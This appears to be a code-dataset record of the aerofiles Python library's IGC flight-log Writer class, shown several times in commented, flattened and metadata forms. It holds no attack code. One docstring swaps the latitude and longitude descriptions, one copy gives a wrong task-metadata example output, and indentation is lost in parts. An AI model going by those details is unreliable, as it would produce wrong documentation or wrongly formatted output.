            # -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
            # -> HFGPSuBLOX LEA-4S-2,16,max9000m
            # -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
            # -> HFCIDCOMPETITIONID:2H
            # -> HFCCLCOMPETITIONCLASS:Doubleseater

        This method will throw a :class:`ValueError` if a mandatory header is
        missing and will fill others up with empty strings if no value was
        given. The optional headers are only written if they are part of the
        specified :class:`dict`.

        .. admonition:: Note

            The use of this method is encouraged compared to calling all the
            other header-writing methods manually!

        :param headers: a :class:`dict` of all the headers that should be
            written.
        """
        # Fail early if any mandatory header key is missing.
        for header in self.REQUIRED_HEADERS:
            if header not in headers:
                raise ValueError('%s header missing' % header)
        self.write_logger_id(
            headers['manufacturer_code'],
            headers['logger_id'],
            extension=headers.get('logger_id_extension')
        )
        # The remaining headers are written in the order mandated by the
        # IGC specification; optional ones are skipped when absent.
        self.write_date(headers['date'])
        self.write_fix_accuracy(headers.get('fix_accuracy'))
        self.write_pilot(headers.get('pilot', ''))
        if 'copilot' in headers:
            self.write_copilot(headers['copilot'])
        self.write_glider_type(headers.get('glider_type', ''))
        self.write_glider_id(headers.get('glider_id', ''))
        self.write_gps_datum(
            code=headers.get('gps_datum_code'),
            gps_datum=headers.get('gps_datum'),
        )
        self.write_firmware_version(headers.get('firmware_version', ''))
        self.write_hardware_version(headers.get('hardware_version', ''))
        self.write_logger_type(headers['logger_type'])
        self.write_gps_receiver(headers['gps_receiver'])
        self.write_pressure_sensor(headers.get('pressure_sensor', ''))
        if 'competition_id' in headers:
            self.write_competition_id(headers['competition_id'])
        if 'competition_class' in headers:
            self.write_competition_class(headers['competition_class'])
        if 'club' in headers:
            self.write_club(headers['club'])
    def write_extensions(self, type, start_byte, extensions):
        """Shared backend for the I and J extension declaration records.

        Each declared extension occupies ``length`` bytes starting at
        ``start_byte`` (1-indexed byte position within the record).

        :param type: record type letter (``'I'`` or ``'J'``)
        :param start_byte: byte position of the first extension value
        :param extensions: a list of ``(code, length)`` tuples
        :raises ValueError: for more than 99 extensions or invalid codes
        """
        num_extensions = len(extensions)
        # The count field is two digits wide, so at most 99 fit.
        if num_extensions >= 100:
            raise ValueError('Too many extensions')
        record = '%02d' % num_extensions
        for extension, length in extensions:
            if not patterns.EXTENSION_CODE.match(extension):
                raise ValueError('Invalid extension: %s' % extension)
            # Byte ranges are inclusive: e.g. 3 bytes at 36 -> "3638".
            end_byte = start_byte + length - 1
            record += '%02d%02d%s' % (start_byte, end_byte, extension)
            start_byte = start_byte + length
        self.write_record(type, record)
    def write_fix_extensions(self, extensions):
        """
        Write the fix extensions description header::

            writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
            # -> I033638FXA3940SIU4143ENL

        :param extensions: a list of ``(extension, length)`` tuples
        """
        # Remember the declaration so write_fix() can validate the extension
        # values passed with each B record.
        self.fix_extensions = extensions
        # B record extension values start at byte 36 (after the basic fix).
        self.write_extensions('I', 36, extensions)
    def write_k_record_extensions(self, extensions):
        """
        Write the K record extensions description header::

            writer.write_k_record_extensions([('HDT', 5)])
            # -> J010812HDT

        Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
        associated records.

        :param extensions: a list of ``(extension, length)`` tuples
        """
        # Remember the declaration so write_k_record() can validate the
        # extension values passed with each K record.
        self.k_record_extensions = extensions
        # K record extension values start at byte 8 (after the timestamp).
        self.write_extensions('J', 8, extensions)
    def write_task_metadata(
            self, declaration_datetime=None, flight_date=None,
            task_number=None, turnpoints=None, text=None):
        """
        Write the task declaration metadata record::

            writer.write_task_metadata(
                datetime.datetime(2014, 4, 13, 12, 53, 2),
                task_number=42,
                turnpoints=3,
            )
            # -> C130414125302000000004203

        There are sensible defaults in place for all parameters except for
        the ``turnpoints`` parameter. If you don't pass that parameter the
        method will raise a :class:`ValueError`. The other parameter defaults
        are mentioned in the list below.

        :param declaration_datetime: a :class:`datetime.datetime` instance of
            the UTC date and time at the time of declaration (default:
            current date and time)
        :param flight_date: a :class:`datetime.date` instance of the intended
            date of the flight (default: ``000000``, which means "use
            declaration date")
        :param task_number: task number for the flight date or an
            integer-based identifier (default: ``0001``)
        :param turnpoints: the number of turnpoints in the task (not counting
            start and finish points!)
        :param text: optional text to append to the metadata record
        """
        if declaration_datetime is None:
            declaration_datetime = datetime.datetime.utcnow()
        # A datetime is rendered as DDMMYYHHMMSS; a preformatted string is
        # accepted as-is after validation.
        if isinstance(declaration_datetime, datetime.datetime):
            declaration_datetime = (
                self.format_date(declaration_datetime) +
                self.format_time(declaration_datetime)
            )
        elif not patterns.DATETIME.match(declaration_datetime):
            raise ValueError('Invalid declaration datetime: %s' %
                             declaration_datetime)
        if flight_date is None:
            flight_date = '000000'
        else:
            flight_date = self.format_date(flight_date)
        if task_number is None:
            task_number = 1
        elif not isinstance(task_number, int):
            raise ValueError('Invalid task number: %s' % task_number)
        if not isinstance(turnpoints, int):
            raise ValueError('Invalid turnpoints: %s' % turnpoints)
        record = '{0}{1}{2:04d}{3:02d}'.format(
            declaration_datetime,
            flight_date,
            task_number,
            turnpoints,
        )
        if text:
            record += text
        self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
    def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
                  pressure_alt=None, gps_alt=None, extensions=None):
        """
        Write a fix record::

            writer.write_fix(
                datetime.time(12, 34, 56),
                latitude=51.40375,
                longitude=6.41275,
                valid=True,
                pressure_alt=1234,
                gps_alt=1432,
            )
            # -> B1234565124225N00624765EA0123401432

        :param time: UTC time of the fix record (default:
            :meth:`~datetime.datetime.utcnow`)
        :param latitude: latitude of the last GPS fix
        :param longitude: longitude of the last GPS fix
        :param valid: ``True`` if the current GPS fix is 3D
        :param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
            sea level datum
        :param gps_alt: altitude above the WGS84 ellipsoid
        :param extensions: a list of extension values according to previous
            declaration through
            :meth:`~aerofiles.igc.Writer.write_fix_extensions`
        """
        if time is None:
            time = datetime.datetime.utcnow()
        record = self.format_time(time)
        record += self.format_latitude(latitude)
        record += self.format_longitude(longitude)
        # 'A' marks a valid 3D fix, 'V' a void/2D one.
        record += 'A' if valid else 'V'
        record += '%05d' % (pressure_alt or 0)
        record += '%05d' % (gps_alt or 0)
        if self.fix_extensions or extensions:
            # Extension values must match the earlier I record declaration,
            # both in count and in per-value width.
            if not (isinstance(extensions, list) and
                    isinstance(self.fix_extensions, list)):
                raise ValueError('Invalid extensions list')
            if len(extensions) != len(self.fix_extensions):
                raise ValueError(
                    'Number of extensions does not match declaration')
            for type_length, value in zip(self.fix_extensions, extensions):
                length = type_length[1]
                # Numeric values are zero-padded to the declared width.
                if isinstance(value, (int, float)):
                    value = ('%0' + str(length) + 'd') % value
                if len(value) != length:
                    raise ValueError('Extension value has wrong length')
                record += value
        self.write_record('B', record)
    def write_event(self, *args):
        """
        Write an event record::

            writer.write_event(datetime.time(12, 34, 56), 'PEV')
            # -> E123456PEV

            writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
            # -> E123456PEVSome Text

            writer.write_event('PEV')  # uses utcnow()
            # -> E121503PEV

        :param time: UTC time of the event record (default:
            :meth:`~datetime.datetime.utcnow`)
        :param code: event type as three-letter-code
        :param text: additional text describing the event (optional)
        """
        # The positional arguments are interpreted by count and type:
        # (time, code, text), (time, code), (code, text) or (code,).
        num_args = len(args)
        if not (1 <= num_args <= 3):
            raise ValueError('Invalid number of parameters received')
        if num_args == 3:
            time, code, text = args
        elif num_args == 1:
            code = args[0]
            time = text = None
        elif isinstance(args[0], (datetime.time, datetime.datetime)):
            # Two arguments starting with a time: (time, code).
            time, code = args
            text = None
        else:
            # Two arguments without a time: (code, text).
            code, text = args
            time = None
        if time is None:
            time = datetime.datetime.utcnow()
        if not patterns.THREE_LETTER_CODE.match(code):
            raise ValueError('Invalid event code')
        record = self.format_time(time)
        record += code
        if text:
            record += text
        self.write_record('E', record)
    def write_satellites(self, *args):
        """
        Write a satellite constellation record::

            writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
            # -> F12345601020522

        :param time: UTC time of the satellite constellation record (default:
            :meth:`~datetime.datetime.utcnow`)
        :param satellites: a list of satellite IDs as either two-character
            strings or integers below 100
        """
        # Accept either (satellites,) or (time, satellites).
        num_args = len(args)
        if num_args not in (1, 2):
            raise ValueError('Invalid number of parameters received')
        if num_args == 1:
            satellites = args[0]
            time = None
        else:
            time, satellites = args
        if time is None:
            time = datetime.datetime.utcnow()
        record = self.format_time(time)
        for satellite in satellites:
            # Integer IDs are zero-padded to the fixed two-character width.
            if isinstance(satellite, int):
                satellite = '%02d' % satellite
            if len(satellite) != 2:
                raise ValueError('Invalid satellite ID')
            record += satellite
        self.write_record('F', record)
    def write_k_record(self, *args):
        """
        Write a K record::

            writer.write_k_record_extensions([
                ('FXA', 3), ('SIU', 2), ('ENL', 3),
            ])
            writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])

            # -> J030810FXA1112SIU1315ENL
            # -> K02030402313002

        :param time: UTC time of the k record (default:
            :meth:`~datetime.datetime.utcnow`)
        :param extensions: a list of extension values according to previous
            declaration through
            :meth:`~aerofiles.igc.Writer.write_k_record_extensions`
        """
        # Accept either (extensions,) or (time, extensions).
        num_args = len(args)
        if num_args not in (1, 2):
            raise ValueError('Invalid number of parameters received')
        if num_args == 1:
            extensions = args[0]
            time = None
        else:
            time, extensions = args
        if time is None:
            time = datetime.datetime.utcnow()
        record = self.format_time(time)
        # Values must match the earlier J record declaration, both in count
        # and in per-value width.
        if not (isinstance(extensions, list) and
                isinstance(self.k_record_extensions, list)):
            raise ValueError('Invalid extensions list')
        if len(extensions) != len(self.k_record_extensions):
            raise ValueError(
                'Number of extensions does not match declaration')
        for type_length, value in zip(self.k_record_extensions, extensions):
            length = type_length[1]
            # Numeric values are zero-padded to the declared width.
            if isinstance(value, (int, float)):
                value = ('%0' + str(length) + 'd') % value
            if len(value) != length:
                raise ValueError('Extension value has wrong length')
            record += value
        self.write_record('K', record)
    def write_comment(self, code, text):
        """
        Write a comment record::

            writer.write_comment('PLT', 'Arrived at the first turnpoint')
            # -> LPLTArrived at the first turnpoint

        :param code: a three-letter-code describing the source of the comment
            (e.g. ``PLT`` for pilot)
        :param text: the text that should be added to the comment
        :raises ValueError: if ``code`` is not a valid three-letter-code
        """
        if not patterns.THREE_LETTER_CODE.match(code):
            raise ValueError('Invalid source')
        self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_fix | python | def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record) | Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions` | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L661-L719 | [
"def format_latitude(self, value):\n return self.format_coordinate(\n value, default='0000000N', is_latitude=True)\n",
"def format_longitude(self, value):\n return self.format_coordinate(\n value, default='00000000E', is_latitude=False)\n",
"def format_time(self, time):\n if isinstance(ti... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
    """
    Write the fix extensions description header::

        writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
        # -> I033638FXA3940SIU4143ENL

    :param extensions: a list of ``(extension, length)`` tuples
    """
    # Remember the declaration so that later write_fix() calls can be
    # validated against it; extension data in B records starts at
    # byte 36.
    self.fix_extensions = extensions
    self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
    """
    Write the K record extensions description header::

        writer.write_k_record_extensions([('HDT', 5)])
        # -> J010812HDT

    Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
    associated records.

    :param extensions: a list of ``(extension, length)`` tuples
    """
    # Remember the declaration so that write_k_record() can validate
    # the values it is given; data in K records starts at byte 8.
    self.k_record_extensions = extensions
    self.write_extensions('J', 8, extensions)
def write_task_metadata(
        self, declaration_datetime=None, flight_date=None,
        task_number=None, turnpoints=None, text=None):
    """
    Write the task declaration metadata record::

        writer.write_task_metadata(
            datetime.datetime(2014, 4, 13, 12, 53, 2),
            task_number=42,
            turnpoints=3,
        )
        # -> C140413125302000000004203

    There are sensible defaults in place for all parameters except for
    the ``turnpoints`` parameter. If you don't pass that parameter the
    method will raise a :class:`ValueError`. The other parameter
    defaults are mentioned in the list below.

    :param declaration_datetime: a :class:`datetime.datetime` instance
        of the UTC date and time at the time of declaration (default:
        current date and time)
    :param flight_date: a :class:`datetime.date` instance of the
        intended date of the flight (default: ``000000``, which means
        "use declaration date")
    :param task_number: task number for the flight date or an
        integer-based identifier (default: ``0001``)
    :param turnpoints: the number of turnpoints in the task (not
        counting start and finish points!)
    :param text: optional text to append to the metadata record
    """
    if declaration_datetime is None:
        declaration_datetime = datetime.datetime.utcnow()

    # Accept either a datetime object (formatted to DDMMYYHHMMSS) or a
    # pre-formatted string, which must match the expected pattern.
    if isinstance(declaration_datetime, datetime.datetime):
        declaration_datetime = (
            self.format_date(declaration_datetime) +
            self.format_time(declaration_datetime)
        )
    elif not patterns.DATETIME.match(declaration_datetime):
        raise ValueError('Invalid declaration datetime: %s' %
                         declaration_datetime)

    # '000000' is the specified placeholder for "same day as the
    # declaration".
    if flight_date is None:
        flight_date = '000000'
    else:
        flight_date = self.format_date(flight_date)

    if task_number is None:
        task_number = 1
    elif not isinstance(task_number, int):
        raise ValueError('Invalid task number: %s' % task_number)

    if not isinstance(turnpoints, int):
        raise ValueError('Invalid turnpoints: %s' % turnpoints)

    # Task number is zero-padded to four digits, the turnpoint count
    # to two.
    record = '{0}{1}{2:04d}{3:02d}'.format(
        declaration_datetime,
        flight_date,
        task_number,
        turnpoints,
    )

    if text:
        record += text

    self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
